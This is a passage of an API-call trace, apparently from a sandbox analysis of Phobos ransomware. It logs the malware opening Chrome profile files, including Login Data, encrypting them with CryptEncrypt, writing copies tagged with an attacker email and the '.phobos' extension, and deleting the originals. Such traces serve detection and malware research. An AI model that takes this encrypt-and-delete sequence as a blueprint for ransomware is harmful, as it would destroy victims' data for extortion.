(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.964] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.964] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.964] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.964] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.964] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0184.965] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0184.965] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0184.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.966] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.966] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.966] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.966] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.966] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.966] CloseHandle (hObject=0x178) returned 1 [0184.966] CloseHandle (hObject=0x134) returned 1 [0184.966] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current")) returned 1 [0184.967] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.968] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.968] CloseHandle (hObject=0x134) returned 1 [0184.969] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.970] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=196) returned 1 [0184.970] CloseHandle (hObject=0x134) returned 1 [0184.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log")) returned 0x2020 [0184.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.970] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.970] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.970] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.970] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xc4, lpOverlapped=0x0) returned 1 [0184.971] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd0, dwBufLen=0xd0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd0) returned 1 [0184.971] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xd0, lpOverlapped=0x0) returned 1 [0184.972] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.972] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.972] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.972] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.972] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.972] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.972] CloseHandle (hObject=0x134) returned 1 [0184.972] CloseHandle (hObject=0x178) returned 1 [0184.972] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log")) returned 1 [0184.973] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.973] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=41) returned 1 [0184.973] CloseHandle (hObject=0x178) returned 1 [0184.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001")) returned 0x2020 [0184.974] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.974] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.974] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.974] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.974] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.974] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x29, lpOverlapped=0x0) returned 1 [0184.975] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.975] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0184.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0184.976] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.976] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.976] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.976] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.976] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.976] CloseHandle (hObject=0x178) returned 1 [0184.976] CloseHandle (hObject=0x134) returned 1 [0184.976] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001")) returned 1 [0184.977] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.978] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=12288) returned 1 [0184.979] CloseHandle (hObject=0x134) returned 1 [0184.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage")) returned 0x2020 [0184.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.999] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.999] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.999] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0184.999] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.999] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3000, lpOverlapped=0x0) returned 1 [0185.104] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3010, dwBufLen=0x3010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3010) returned 1 [0185.104] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3010, lpOverlapped=0x0) returned 1 [0185.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0185.106] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0185.106] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0185.106] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.106] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0185.106] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.106] CloseHandle (hObject=0x134) returned 1 [0185.106] CloseHandle (hObject=0x180) returned 1 [0185.106] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage")) returned 1 [0185.107] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.108] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0185.108] CloseHandle (hObject=0x180) returned 1 [0185.108] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0185.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.109] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=18432) returned 1 [0185.109] CloseHandle (hObject=0x180) returned 1 [0185.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 0x2020 [0185.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0185.110] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.110] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0185.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login 